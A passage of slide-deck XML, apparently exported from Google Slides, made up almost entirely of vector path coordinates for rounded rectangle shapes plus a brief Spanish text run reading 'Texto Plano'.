                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468194" y="1160338"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468194" y="1160338"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661453" y="376086"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661453" y="376086"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2076900" y="214350"/>
            <a:ext cx="29355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400">
                <a:solidFill>
                  <a:schemeClr val="dk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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Texto Plano </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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9" name="Google Shape;259;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7219502" y="3811364"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7219502" y="3811364"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098008" y="4665538"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098008" y="4665538"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
